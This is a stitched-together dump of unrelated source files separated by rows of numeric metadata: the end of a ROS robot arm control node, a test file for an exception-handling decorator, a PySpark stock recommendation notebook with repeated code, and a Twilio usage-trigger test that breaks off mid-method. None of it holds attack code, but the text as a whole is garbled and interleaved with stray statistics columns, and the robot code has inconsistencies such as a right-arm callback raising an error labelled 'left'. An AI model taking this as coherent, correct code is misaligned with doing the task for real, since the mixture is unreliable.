rospy.logerr(errmsg)
result = RobotArmMoveGlobalResult(success=False)
self.srv_lowlevel_left_g.set_aborted(result, errmsg)
return
t = goal.target
pos = [t.linear.x, t.linear.y, t.linear.z, t.angular.x, t.angular.y, t.angular.z]
try:
self.left.send_msg_and_wait(pos,goal.target.fut000,goal.target.kakujiku)
except Exception as e:
errmsg = "exception during send_msg_and_wait: %s" % e
rospy.logerr(errmsg)
result = RobotArmMoveGlobalResult(success=False)
self.srv_lowlevel_left_g.set_aborted(result, errmsg)
return
result = RobotArmMoveGlobalResult(success=True)
self.srv_lowlevel_left_g.set_succeeded(result)
#BinToteMove bin,position(string)->success,position(twist),is_calibrated,globaL_position
def cb_move_to_bin_left(self, goal):
try:
self.left_preparation()
except Exception as e:
errmsg = "exception during left_preparation: %s" % e
rospy.logerr(errmsg)
result = BinToteMoveResult(success=False)
self.srv_highlevel_left.set_aborted(result, errmsg)
return
if 'tote' not in goal.bin and goal.bin not in ['bin_'+ j for j in 'ABCDEFGHIJKL']:
result = BinToteMoveResult(success=False)
self.srv_highlevel_left.set_aborted(result,'Invalid bin name')
else:
if 'tote' in goal.bin:
try:
if goal.position in ['photo', 'photo_down','photo_xm','photo_xp','photo_ym','photo_yp']:
pos = self.left.preset_position['tote_' + goal.position]
self.left.move_position('tote_' + goal.position, goal.fut000, goal.kakujiku)
else:
pos = self.left.preset_position['tote']
self.left.move_position('tote', goal.fut000, goal.kakujiku)
except Exception as e:
errmsg = "exception during move_position: %s" % e
rospy.logerr(errmsg)
result = BinToteMoveResult(success=False)
self.srv_highlevel_left.set_aborted(result, errmsg)
return
p = Vector3(pos[0], pos[1], pos[2])
r = Vector3(pos[3], pos[4], pos[5])
is_calib = self.checkcalib()
result = BinToteMoveResult(success=True, global_position=Twist(p, r),is_calibrated=is_calib.success, position=Twist(p, r))
self.srv_highlevel_left.set_succeeded(result)
else:
if goal.position in ['photo', 'pre', 'rpre', 'photo_l', 'photo_r', 'front', 'right', 'left', 'pull']:
if goal.position == 'left':
po = 'photo_l'
elif goal.position == 'right':
po = 'photo_r'
else:
po = goal.position
else:
po = "photo"
name = goal.bin + '_' + po
pos = self.left.preset_position[name]
print "looking up position for %s/%s" % (goal.bin, pos)
p = Vector3(pos[0], pos[1], pos[2])
r = Vector3(pos[3], pos[4], pos[5])
res = self.adjustglobal(bin='',point=Twist(p,r))
if res.is_calibrated == False:
result = BinToteMoveResult(success=False)
self.srv_highlevel_left.set_aborted(result, 'No calibration yet')
else:
apos = [res.point.linear.x, res.point.linear.y, res.point.linear.z, res.point.angular.x, res.point.angular.y, res.point.angular.z]
try:
self.left.send_msg_and_wait(apos,goal.fut000,goal.kakujiku)
except Exception as e:
errmsg = "exception during send_msg_and_wait: %s" % e
rospy.logerr(errmsg)
result = BinToteMoveResult(success=False)
self.srv_highlevel_left.set_aborted(result, errmsg)
return
p = Vector3(apos[0], apos[1], apos[2])
r = Vector3(apos[3], apos[4], apos[5])
pos = self.global2bin(bin=goal.bin, point=Twist(p,r))
result = BinToteMoveResult(success=True, global_position=Twist(p, r),is_calibrated=pos.is_calibrated, position=pos.point)
self.srv_highlevel_left.set_succeeded(result)
#BinToteMove bin, position->success, position
def cb_move_to_bin_left_global(self, goal):
try:
self.left_preparation()
except Exception as e:
errmsg = "exception during left_preparation: %s" % e
rospy.logerr(errmsg)
result = BinToteMoveResult(success=False)
self.srv_highlevel_left_g.set_aborted(result, errmsg)
return
try:
if 'tote' in goal.bin:
if goal.position in ['photo', 'photo_down','photo_xm','photo_xp','photo_ym','photo_yp']:
pos = self.left.preset_position['tote_' + goal.position]
self.left.move_position('tote_' + goal.position, goal.fut000, goal.kakujiku)
else:
pos = self.left.preset_position['tote']
self.left.move_position('tote', goal.fut000, goal.kakujiku)
p = Vector3(pos[0], pos[1], pos[2])
r = Vector3(pos[3], pos[4], pos[5])
is_calib = self.check_calib()
result = BinToteMoveResult(success=True, global_position=Twist(p, r),is_calibrated=is_calib.success, position=Twist(p, r))
self.srv_highlevel_left.set_succeeded(result)
else:
if goal.position in ['photo', 'pre', 'rpre', 'photo_l', 'photo_r', 'front', 'right', 'left', 'pull']:
if goal.position == 'left':
po = 'photo_l'
elif goal.position == 'right':
po = 'photo_r'
else:
po = goal.position
else:
po = "photo"
name = goal.bin + '_' + po
pos = self.left.preset_position[name]
self.left.move_position(goal.bin, goal.fut000, goal.kakujiku, po)
except Exception as e:
errmsg = "exception during move_position: %s" % e
rospy.logerr(errmsg)
result = BinToteMoveResult(success=False)
self.srv_highlevel_left_g.set_aborted(result, errmsg)
return
print "looking up position for %s/%s" % (goal.bin, pos)
p = Vector3(pos[0], pos[1], pos[2])
r = Vector3(pos[3], pos[4], pos[5])
result = BinToteMoveResult(success=True, global_position=Twist(p, r))
self.srv_highlevel_left_g.set_succeeded(result)
#RobotArmMove bin, target(twist) -> success
def cb_move_to_right(self, goal):
print "move_to_right:", self.twist2str(goal.target)
try:
self.right_preparation()
except Exception as e:
errmsg = "exception during right_preparation: %s" % e
rospy.logerr(errmsg)
result = RobotArmMoveResult(success=False)
self.srv_lowlevel_right.set_aborted(result, errmsg)
return
r = self.bin2global(bin = goal.bin, point=goal.target)
if not r.is_calibrated:
raise util.RobotNotCalibrated("left", str(goal.target))
t = r.point
pos = [t.linear.x, t.linear.y, t.linear.z, t.angular.x, t.angular.y, t.angular.z]
print 'go to', pos
try:
self.right.send_msg_and_wait(pos,goal.target.fut000,goal.target.kakujiku)
except Exception as e:
errmsg = "exception during send_msg_and_wait: %s" % e
rospy.logerr(errmsg)
result = RobotArmMoveResult(success=False)
self.srv_lowlevel_right.set_aborted(result, errmsg)
return
if r.success == True:
result = RobotArmMoveResult(success=True)
self.srv_lowlevel_right.set_succeeded(result)
else:
result = RobotArmMoveResult(success=False)
self.srv_lowlevel_right.set_aborted(result,"Cannot convert position")
#RobotArmMoveGlobal target(twist)->success
def cb_move_to_right_global(self, goal):
print "move_to_right_global:", self.twist2str(goal.target)
try:
self.right_preparation()
except Exception as e:
errmsg = "exception during right_preparation: %s" % e
rospy.logerr(errmsg)
result = RobotArmMoveGlobalResult(success=False)
self.srv_lowlevel_right_g.set_aborted(result, errmsg)
return
t = goal.target
pos = [t.linear.x, t.linear.y, t.linear.z, t.angular.x, t.angular.y, t.angular.z]
try:
self.right.send_msg_and_wait(pos,goal.target.fut000,goal.target.kakujiku)
except Exception as e:
errmsg = "exception during send_msg_and_wait: %s" % e
rospy.logerr(errmsg)
result = RobotArmMoveGlobalResult(success=False)
self.srv_lowlevel_right_g.set_aborted(result, errmsg)
return
result = RobotArmMoveGlobalResult(success=True)
self.srv_lowlevel_right_g.set_succeeded(result)
#BinToteMove bin,position(string)->success,position(twist),is_calibrated,globaL_position
def cb_move_to_bin_right(self, goal):
try:
self.right_preparation()
except Exception as e:
errmsg = "exception during right_preparation: %s" % e
rospy.logerr(errmsg)
result = BinToteMoveResult(success=False)
self.srv_highlevel_right.set_aborted(result, errmsg)
return
if 'tote' not in goal.bin and goal.bin not in ['bin_'+ j for j in 'ABCDEFGHIJKL']:
result = BinToteMoveResult(success=False)
self.srv_highlevel_right.set_aborted(result,'Invalid bin name')
else:
if 'tote' in goal.bin:
try:
if goal.position in ['photo', 'photo_down','photo_xm','photo_xp','photo_ym','photo_yp']:
pos = self.right.preset_position['tote_' + goal.position]
self.right.move_position('tote_' + goal.position, goal.fut000, goal.kakujiku)
else:
pos = self.right.preset_position['tote']
self.right.move_position('tote', goal.fut000, goal.kakujiku)
except Exception as e:
errmsg = "exception during move_position: %s" % e
rospy.logerr(errmsg)
result = BinToteMoveResult(success=False)
self.srv_highlevel_right.set_aborted(result, errmsg)
return
p = Vector3(pos[0], pos[1], pos[2])
r = Vector3(pos[3], pos[4], pos[5])
is_calib = self.checkcalib()
result = BinToteMoveResult(success=True, global_position=Twist(p, r),is_calibrated=is_calib.success, position=Twist(p, r))
self.srv_highlevel_right.set_succeeded(result)
else:
if goal.position in ['photo', 'pre', 'rpre', 'photo_l', 'photo_r', 'front', 'right', 'left', 'pull']:
if goal.position == 'left':
po = 'photo_l'
elif goal.position == 'right':
po = 'photo_r'
else:
po = goal.position
else:
po = "photo"
name = goal.bin + '_' + po
pos = self.right.preset_position[name]
print "looking up position for %s/%s" % (goal.bin, pos)
p = Vector3(pos[0], pos[1], pos[2])
r = Vector3(pos[3], pos[4], pos[5])
res = self.adjustglobal(bin='',point=Twist(p,r))
if res.is_calibrated == False:
result = BinToteMoveResult(success=False)
self.srv_highlevel_right.set_aborted(result, 'Invalid bin name')
else:
apos = [res.point.linear.x, res.point.linear.y, res.point.linear.z, res.point.angular.x, res.point.angular.y, res.point.angular.z]
try:
self.right.send_msg_and_wait(apos,goal.fut000,goal.kakujiku)
except Exception as e:
errmsg = "exception during send_msg_and_wait: %s" % e
rospy.logerr(errmsg)
result = BinToteMoveResult(success=False)
self.srv_highlevel_right.set_aborted(result, errmsg)
return
print "looking up position for %s/%s" % (goal.bin, pos)
p = Vector3(apos[0], apos[1], apos[2])
r = Vector3(apos[3], apos[4], apos[5])
pos = self.global2bin(bin=goal.bin, point=Twist(p,r))
result = BinToteMoveResult(success=True, global_position=Twist(p, r),is_calibrated=pos.is_calibrated, position=pos.point)
self.srv_highlevel_right.set_succeeded(result)
#BinToteMove bin, position->success, position
def cb_move_to_bin_right_global(self, goal):
print 'goal = ', goal
print "moving away left arm, then moving right arm:"
try:
self.right_preparation()
except Exception as e:
errmsg = "exception during right_preparation: %s" % e
rospy.logerr(errmsg)
result = BinToteMoveResult(success=False)
self.srv_highlevel_right_g.set_aborted(result, errmsg)
return
try:
if 'tote' in goal.bin:
if goal.position in ['photo', 'photo_down','photo_xm','photo_xp','photo_ym','photo_yp']:
pos = self.right.preset_position['tote_' + goal.position]
self.right.move_position('tote_' + goal.position, goal.fut000, goal.kakujiku)
else:
pos = self.right.preset_position['tote']
self.right.move_position('tote', goal.fut000, goal.kakujiku)
p = Vector3(pos[0], pos[1], pos[2])
r = Vector3(pos[3], pos[4], pos[5])
is_calib = self.checkcalib()
result = BinToteMoveResult(success=True, global_position=Twist(p, r),is_calibrated=is_calib.success, position=Twist(p, r))
self.srv_highlevel_right_g.set_succeeded(result)
else:
if goal.position in ['photo', 'pre', 'rpre', 'photo_l', 'photo_r', 'front', 'right', 'left', 'pull']:
if goal.position == 'left':
po = 'photo_l'
elif goal.position == 'right':
po = 'photo_r'
else:
po = goal.position
else:
po = "photo"
name = goal.bin + '_' + po
pos = self.right.preset_position[name]
self.right.move_position(goal.bin, goal.fut000, goal.kakujiku, po)
except Exception as e:
errmsg = "exception during move_position: %s" % e
rospy.logerr(errmsg)
result = BinToteMoveResult(success=False)
self.srv_highlevel_right_g.set_aborted(result, errmsg)
return
print "looking up position for %s/%s" % (goal.bin, pos)
p = Vector3(pos[0], pos[1], pos[2])
r = Vector3(pos[3], pos[4], pos[5])
result = BinToteMoveResult(success=True, global_position=Twist(p, r))
self.srv_highlevel_right_g.set_succeeded(result)
if __name__ == '__main__':
rospy.init_node("arm_control", anonymous=True)
a = ArmControl()
rospy.spin()
| 51.128588
| 150
| 0.563964
| 5,861
| 44,533
| 4.075073
| 0.069101
| 0.115475
| 0.139424
| 0.148593
| 0.836627
| 0.800955
| 0.765701
| 0.745394
| 0.723329
| 0.691635
| 0
| 0.043933
| 0.301799
| 44,533
| 870
| 151
| 51.187356
| 0.724214
| 0.04792
| 0
| 0.590595
| 0
| 0.001383
| 0.115175
| 0.001607
| 0
| 0
| 0
| 0.001149
| 0
| 0
| null | null | 0
| 0.02213
| null | null | 0.041494
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
e3972322d31d71f22b69696cb73b5fb8eb925bf8
| 3,731
|
py
|
Python
|
tests/test_decorator_wrappers.py
|
EvgeniyBurdin/logdec
|
ae58d2e4744ebdfc1ea5cd20c24d04e230d015f1
|
[
"MIT"
] | 1
|
2021-10-11T06:31:56.000Z
|
2021-10-11T06:31:56.000Z
|
tests/test_decorator_wrappers.py
|
EvgeniyBurdin/logdec
|
ae58d2e4744ebdfc1ea5cd20c24d04e230d015f1
|
[
"MIT"
] | 2
|
2021-12-21T01:21:39.000Z
|
2021-12-21T10:51:41.000Z
|
tests/test_decorator_wrappers.py
|
EvgeniyBurdin/logdec
|
ae58d2e4744ebdfc1ea5cd20c24d04e230d015f1
|
[
"MIT"
] | 1
|
2021-12-21T01:22:06.000Z
|
2021-12-21T01:22:06.000Z
|
import asyncio
from exdec.data_classes import DecData
from exdec.decorator import _async_wrapper as async_wrapper
from exdec.decorator import _wrapper as wrapper
from exdec.decorator import dec_args0_is_func
class FakeManager:
def __init__(self):
self.clear_handler_calls()
def execute_handler(
self, fake_handler: str, dec_data: DecData
):
self.is_called[fake_handler] = True
async def async_execute_handler(
self, fake_handler: str, dec_data: DecData
):
self.is_called[fake_handler] = True
def clear_handler_calls(self):
self.is_called = {
"before_handler": False,
"after_handler": False,
"exc_handler": False,
}
RESULT_FUNC = 555
def func():
return RESULT_FUNC
def func_with_exception():
return 1 / 0
async def async_func():
return RESULT_FUNC
async def async_func_with_exception():
return 1 / 0
def test_wrapper(dec_data: DecData):
fm = FakeManager()
result = wrapper(func, dec_data, fm, None, None, "exc_handler")
assert not fm.is_called["before_handler"]
assert not fm.is_called["after_handler"]
assert not fm.is_called["exc_handler"]
assert dec_data.func_info.exception is None
assert dec_data.func_info.result == RESULT_FUNC
assert dec_data.func_info.result == result
fm.clear_handler_calls()
result = wrapper(
func, dec_data, fm, "before_handler", "after_handler", "exc_handler"
)
assert fm.is_called["before_handler"]
assert fm.is_called["after_handler"]
assert not fm.is_called["exc_handler"]
assert dec_data.func_info.exception is None
assert dec_data.func_info.result == RESULT_FUNC
assert dec_data.func_info.result == result
fm.clear_handler_calls()
result = wrapper(
func_with_exception, dec_data, fm, None, None, "exc_handler"
)
assert not fm.is_called["before_handler"]
assert not fm.is_called["after_handler"]
assert fm.is_called["exc_handler"]
assert isinstance(dec_data.func_info.exception, ZeroDivisionError)
assert dec_data.func_info.result is None
assert dec_data.func_info.result == result
def test_async_wrapper(dec_data: DecData):
fm = FakeManager()
result = asyncio.run(async_wrapper(
async_func, dec_data, fm, None, None, "exc_handler"
))
assert not fm.is_called["before_handler"]
assert not fm.is_called["after_handler"]
assert not fm.is_called["exc_handler"]
assert dec_data.func_info.exception is None
assert dec_data.func_info.result == RESULT_FUNC
assert dec_data.func_info.result == result
fm.clear_handler_calls()
result = asyncio.run(async_wrapper(
async_func, dec_data, fm,
"before_handler", "after_handler", "exc_handler"
))
assert fm.is_called["before_handler"]
assert fm.is_called["after_handler"]
assert not fm.is_called["exc_handler"]
assert dec_data.func_info.exception is None
assert dec_data.func_info.result == RESULT_FUNC
assert dec_data.func_info.result == result
fm.clear_handler_calls()
result = asyncio.run(async_wrapper(
async_func_with_exception, dec_data, fm, None, None, "exc_handler"
))
assert not fm.is_called["before_handler"]
assert not fm.is_called["after_handler"]
assert fm.is_called["exc_handler"]
assert isinstance(dec_data.func_info.exception, ZeroDivisionError)
assert dec_data.func_info.result is None
assert dec_data.func_info.result == result
def test_dec_args0_is_func(func):
assert dec_args0_is_func(dec_args=(func, ))
assert not dec_args0_is_func(dec_args=tuple())
assert not dec_args0_is_func(dec_args=(Exception, ))
| 27.843284
| 76
| 0.712142
| 527
| 3,731
| 4.717268
| 0.094877
| 0.078842
| 0.072405
| 0.108608
| 0.838697
| 0.813757
| 0.782381
| 0.752615
| 0.728479
| 0.728479
| 0
| 0.004001
| 0.196194
| 3,731
| 133
| 77
| 28.052632
| 0.824942
| 0
| 0
| 0.625
| 0
| 0
| 0.103458
| 0
| 0
| 0
| 0
| 0
| 0.40625
| 1
| 0.083333
| false
| 0
| 0.052083
| 0.020833
| 0.1875
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
e3c33c341bd842ddf6006554465eae9baf66938e
| 6,039
|
py
|
Python
|
recengine/back-end/Recommendation.py
|
sjayakum/recengine
|
ca0dd1c122c1c6af75757300f552740ae2f72723
|
[
"Apache-2.0"
] | null | null | null |
recengine/back-end/Recommendation.py
|
sjayakum/recengine
|
ca0dd1c122c1c6af75757300f552740ae2f72723
|
[
"Apache-2.0"
] | null | null | null |
recengine/back-end/Recommendation.py
|
sjayakum/recengine
|
ca0dd1c122c1c6af75757300f552740ae2f72723
|
[
"Apache-2.0"
] | null | null | null |
# coding: utf-8
# In[1]:
from test_helper import Test
import os.path
def myMapingFunction(x):
y = x.encode('utf8').split(",")
return y[1:41]
rootDir = os.path.join('data')
inputFilePath = os.path.join('stock.csv')
stockFileName = os.path.join(rootDir,inputFilePath)
numPartitions = 2
rawData = sc.textFile(stockFileName,numPartitions)
totalPoints = rawData.count()
print totalPoints
sampleData = rawData.take(5)
#print sampleData
newRawData = rawData.map(myMapingFunction)
print len(newRawData.take(1)[0])
print newRawData.take(5)
# In[2]:
#TRANSFORM THE DATA
transformedList = []
likingList = newRawData.collect()
memid = 1
while memid < 24000:
i = 0
global transformedList
while i < 40:
if(float(likingList[memid][i])==99):
transformedList.append((memid,i,0.0))
else:
transformedList.append((memid,i,int(float(likingList[memid][i]))))
i = i + 1
memid = memid + 1
print transformedList[0:40]
# In[4]:
transData = sc.parallelize(transformedList)
print transData
print transData.count()
print transData.take(2)
# In[6]:
#BUILDING THE MODEL
from pyspark.mllib.recommendation import ALS, MatrixFactorizationModel, Rating
trainingDataSet, testDataSet = transData.randomSplit([8, 2], 17)
# Build the recommendation model using Alternating Least Squares
rank = 5
numIterations = 5
model = ALS.train(trainingDataSet, rank, numIterations)
# In[38]:
# Evaluate the model on training data
#EXTRACT ONLY (MEMBERID,STOCKID)
testDataSetModified = testDataSet.map(lambda p:(p[0],p[1]))
#PREDICT
predictedData = model.predictAll(testDataSetModified).map(lambda r: ((r[0], r[1]), r[2]))
ratingsAndPredictions = transData.map(lambda r: ((r[0], r[1]), r[2])).join(predictedData)
MSE = ratingsAndPredictions.map(lambda r: (r[1][0] - r[1][1])**2).mean()
print("Root Mean Squared Error = " + str(MSE**0.5))
# In[64]:
### print newRawData.take(30)[25][7]
print newRawData.take(30)[25]
plotActualData = []
loopThroughData = newRawData.take(40)[30]
for x in loopThroughData:
if float(x) == 99:
plotActualData.append(0)
else:
plotActualData.append(int(float(x)))
plotPredictedData = []
k = 0
while (k<40):
plotPredictedData.append(int(model.predict(30,k)))
k = k + 1
import matplotlib.pyplot as plt
plt.plot(range(40),plotActualData,label='actual')
plt.plot(range(40),plotPredictedData,label='predicted')
plt.show()
# In[65]:
print plotActualData[23]
print plotPredictedData[23]
# In[76]:
y = 0
print "stkno"+"\t"+ "howmuch"
while y<40:
temp = int(model.predict(23,y))
if temp > 0:
print str(y)+"\t"+str(temp)
y = y+1
# In[4]:
print rawData.take(2)
# In[7]:
from test_helper import Test
import os.path
from pyspark.mllib.recommendation import ALS, MatrixFactorizationModel, Rating
transformedList = []
transData = 0
newRawData = 0
model = 0
def myMapingFunction(x):
y = x.encode('utf8').split(",")
return y[1:41]
def LoadData():
global newRawData
rootDir = os.path.join('data')
inputFilePath = os.path.join('stock.csv')
stockFileName = os.path.join(rootDir,inputFilePath)
numPartitions = 2
rawData = sc.textFile(stockFileName,numPartitions)
totalPoints = rawData.count()
print totalPoints
#sampleData = rawData.take(5)
#print sampleData
newRawData = rawData.map(myMapingFunction)
#print len(newRawData.take(1)[0])
#print newRawData.take(5)
def ReduceAndTransfromData():
#TRANSFORM THE DATA
global transData
likingList = newRawData.collect()
memid = 1
while memid < 24000:
i = 0
global transformedList
while i < 40:
if(float(likingList[memid][i])==99):
transformedList.append((memid,i,0.0))
else:
transformedList.append((memid,i,int(float(likingList[memid][i]))))
i = i + 1
memid = memid + 1
#print transformedList[0:40]
transData = sc.parallelize(transformedList)
#print transData
#print transData.count()
#print transData.take(2)
#BUILDING THE MODEL
def makeModel():
global model
global transData
trainingDataSet, testDataSet = transData.randomSplit([8, 2], 17)
# Build the recommendation model using Alternating Least Squares
rank = 5
numIterations = 5
model = ALS.train(trainingDataSet, rank, numIterations)
# Evaluate the model on training data
#EXTRACT ONLY (MEMBERID,STOCKID)
testDataSetModified = testDataSet.map(lambda p:(p[0],p[1]))
#PREDICT
predictedData = model.predictAll(testDataSetModified).map(lambda r: ((r[0], r[1]), r[2]))
ratingsAndPredictions = transData.map(lambda r: ((r[0], r[1]), r[2])).join(predictedData)
MSE = ratingsAndPredictions.map(lambda r: (r[1][0] - r[1][1])**2).mean()
print("Root Mean Squared Error = " + str(MSE**0.5))
def getPredictions(memid):
y = 0
tempList = []
print "stkno"+"\t"+ "howmuch"
while y<40:
temp = int(model.predict(23,y))
if temp > 0:
tempList.append(temp)
print str(y)+"\t"+str(temp)
y = y+1
return tempList
def getRecommendation(memid):
getPredictions(memid)
def makeModelReady():
LoadData()
ReduceAndTransfromData()
makeModel()
makeModelReady()
getRecommendation(30)
# In[8]:
getRecommendation(29)
# In[ ]:
### print newRawData.take(30)[25][7]
print newRawData.take(30)[25]
plotActualData = []
loopThroughData = newRawData.take(40)[30]
for x in loopThroughData:
if float(x) == 99:
plotActualData.append(0)
else:
plotActualData.append(int(float(x)))
plotPredictedData = []
k = 0
while (k<40):
plotPredictedData.append(int(model.predict(30,k)))
k = k + 1
import matplotlib.pyplot as plt
plt.plot(range(40),plotActualData,label='actual')
plt.plot(range(40),plotPredictedData,label='predicted')
plt.show()
print plotActualData[23]
print plotPredictedData[23]
| 19.110759
| 93
| 0.661699
| 756
| 6,039
| 5.283069
| 0.183862
| 0.035053
| 0.015023
| 0.016525
| 0.872308
| 0.872308
| 0.849775
| 0.849775
| 0.797196
| 0.787181
| 0
| 0.040546
| 0.199536
| 6,039
| 315
| 94
| 19.171429
| 0.785685
| 0.118728
| 0
| 0.815287
| 0
| 0
| 0.028425
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0.050955
| null | null | 0.133758
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
540e7471bee2dba8d346942aab7226385c06ccb5
| 137
|
py
|
Python
|
tests/codestudio_tests.py
|
xenomorff/code-dot-org-python
|
7b35999dc35fa9ca13c683f43eca631dc92e5da4
|
[
"Unlicense"
] | null | null | null |
tests/codestudio_tests.py
|
xenomorff/code-dot-org-python
|
7b35999dc35fa9ca13c683f43eca631dc92e5da4
|
[
"Unlicense"
] | null | null | null |
tests/codestudio_tests.py
|
xenomorff/code-dot-org-python
|
7b35999dc35fa9ca13c683f43eca631dc92e5da4
|
[
"Unlicense"
] | null | null | null |
import sys
sys.path.append('..')
import codestudio.artist as a
from nose.tools import assert_equals
from nose.tools import assert_raises
| 22.833333
| 36
| 0.810219
| 22
| 137
| 4.954545
| 0.636364
| 0.146789
| 0.238532
| 0.348624
| 0.458716
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.109489
| 137
| 5
| 37
| 27.4
| 0.893443
| 0
| 0
| 0
| 0
| 0
| 0.014599
| 0
| 0
| 0
| 0
| 0
| 0.4
| 1
| 0
| true
| 0
| 0.8
| 0
| 0.8
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
540fcb149f2754fc495fb016301d30b0b8615edf
| 11,366
|
py
|
Python
|
SpoTwillio/lib/python3.6/site-packages/tests/integration/api/v2010/account/usage/test_trigger.py
|
Natfan/funlittlethings
|
80d5378b45b5c0ead725942ee50403bd057514a6
|
[
"MIT"
] | 3
|
2019-11-12T07:55:51.000Z
|
2020-04-01T11:19:18.000Z
|
SpoTwillio/lib/python3.6/site-packages/tests/integration/api/v2010/account/usage/test_trigger.py
|
Natfan/funlittlethings
|
80d5378b45b5c0ead725942ee50403bd057514a6
|
[
"MIT"
] | 7
|
2020-06-06T01:06:19.000Z
|
2022-02-10T11:15:14.000Z
|
SpoTwillio/lib/python3.6/site-packages/tests/integration/api/v2010/account/usage/test_trigger.py
|
Natfan/funlittlethings
|
80d5378b45b5c0ead725942ee50403bd057514a6
|
[
"MIT"
] | 2
|
2019-10-20T14:54:47.000Z
|
2020-06-11T07:29:37.000Z
|
# coding=utf-8
"""
This code was generated by
\ / _ _ _| _ _
| (_)\/(_)(_|\/| |(/_ v1.0.0
/ /
"""
from tests import IntegrationTestCase
from tests.holodeck import Request
from twilio.base.exceptions import TwilioException
from twilio.http.response import Response
class TriggerTestCase(IntegrationTestCase):
def test_fetch_request(self):
self.holodeck.mock(Response(500, ''))
with self.assertRaises(TwilioException):
self.client.api.v2010.accounts(sid="ACaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa") \
.usage \
.triggers(sid="UTaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa").fetch()
self.holodeck.assert_has_request(Request(
'get',
'https://api.twilio.com/2010-04-01/Accounts/ACaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa/Usage/Triggers/UTaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa.json',
))
def test_fetch_response(self):
self.holodeck.mock(Response(
200,
'''
{
"account_sid": "ACaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa",
"api_version": "2010-04-01",
"callback_method": "GET",
"callback_url": "http://cap.com/streetfight",
"current_value": "0",
"date_created": "Sun, 06 Sep 2015 12:58:45 +0000",
"date_fired": null,
"date_updated": "Sun, 06 Sep 2015 12:58:45 +0000",
"friendly_name": "raphael-cluster-1441544325.86",
"recurring": "yearly",
"sid": "UTaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa",
"trigger_by": "price",
"trigger_value": "50",
"uri": "/2010-04-01/Accounts/ACaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa/Usage/Triggers/UTaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa",
"usage_category": "totalprice",
"usage_record_uri": "/2010-04-01/Accounts/ACaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa/Usage/Records?Category=totalprice"
}
'''
))
actual = self.client.api.v2010.accounts(sid="ACaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa") \
.usage \
.triggers(sid="UTaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa").fetch()
self.assertIsNotNone(actual)
def test_update_request(self):
self.holodeck.mock(Response(500, ''))
with self.assertRaises(TwilioException):
self.client.api.v2010.accounts(sid="ACaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa") \
.usage \
.triggers(sid="UTaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa").update()
self.holodeck.assert_has_request(Request(
'post',
'https://api.twilio.com/2010-04-01/Accounts/ACaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa/Usage/Triggers/UTaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa.json',
))
def test_update_response(self):
self.holodeck.mock(Response(
200,
'''
{
"account_sid": "ACaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa",
"api_version": "2010-04-01",
"callback_method": "GET",
"callback_url": "http://cap.com/streetfight",
"current_value": "0",
"date_created": "Sun, 06 Sep 2015 12:58:45 +0000",
"date_fired": null,
"date_updated": "Sun, 06 Sep 2015 12:58:45 +0000",
"friendly_name": "raphael-cluster-1441544325.86",
"recurring": "yearly",
"sid": "UTaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa",
"trigger_by": "price",
"trigger_value": "50",
"uri": "/2010-04-01/Accounts/ACaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa/Usage/Triggers/UTaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa",
"usage_category": "totalprice",
"usage_record_uri": "/2010-04-01/Accounts/ACaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa/Usage/Records?Category=totalprice"
}
'''
))
actual = self.client.api.v2010.accounts(sid="ACaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa") \
.usage \
.triggers(sid="UTaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa").update()
self.assertIsNotNone(actual)
def test_delete_request(self):
self.holodeck.mock(Response(500, ''))
with self.assertRaises(TwilioException):
self.client.api.v2010.accounts(sid="ACaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa") \
.usage \
.triggers(sid="UTaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa").delete()
self.holodeck.assert_has_request(Request(
'delete',
'https://api.twilio.com/2010-04-01/Accounts/ACaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa/Usage/Triggers/UTaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa.json',
))
def test_delete_response(self):
self.holodeck.mock(Response(
204,
None,
))
